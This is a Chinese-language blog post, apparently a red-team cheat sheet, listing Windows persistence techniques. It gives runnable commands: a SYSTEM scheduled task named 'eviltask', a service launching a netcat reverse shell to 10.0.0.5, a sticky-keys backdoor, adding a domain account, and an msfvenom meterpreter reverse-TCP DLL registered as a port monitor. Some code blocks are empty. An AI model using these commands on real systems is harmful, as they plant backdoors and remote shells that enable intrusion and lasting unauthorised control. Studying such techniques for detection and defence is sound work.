用于持久性的 DLL 代理
就是dll劫持
计划任务
创建一个新的计划任务,每分钟启动 shell.cmd:
1 | schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.cmd /ru "SYSTEM" |
服务执行
1 | C:\> sc create evilsvc binpath= "c:\tools\nc 10.0.0.5 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= "" |
粘滞键
将原来的 sethc.exe 替换为 cmd.exe 并重命名。您可能需要首先将 sethc.exe 所有者更改为自己,因为 TrustedIntaller 可能会给您带来困难:
在登录屏幕上按 5 次 Shift 键以调用后门:
创建账户
net user test test123 /add /domain
添加监视器
1 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil64.dll |
编写并编译一个简单的 C++ 代码来注册监视器端口:
1 |
|
将evil64.dll移至%systemroot%
并执行编译后的monitor.cpp
滥用 Windows 管理工具
WMI 事件由 3 个关键部分组成:
事件过滤器 - 系统将侦听的条件(即创建新进程、添加新磁盘等)
事件消费者 - 消费者可以在触发事件过滤器时执行操作(即运行程序、记录到日志文件、执行脚本等)
过滤器到消费者的绑定 - 将事件过滤器和事件消费者结合在一起以便调用事件消费者的粘合物质。
WMI 事件既可以被攻击者使用(持久性,即在系统启动时启动有效负载),也可以被防御者使用(在其创建时杀死进程evil.exe)。
创建WMI __EVENTFILTER
,WMI __EVENTCONSUMER
和WMI __FILTERTOCONSUMERBINDING
:
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 jaytp@qq.com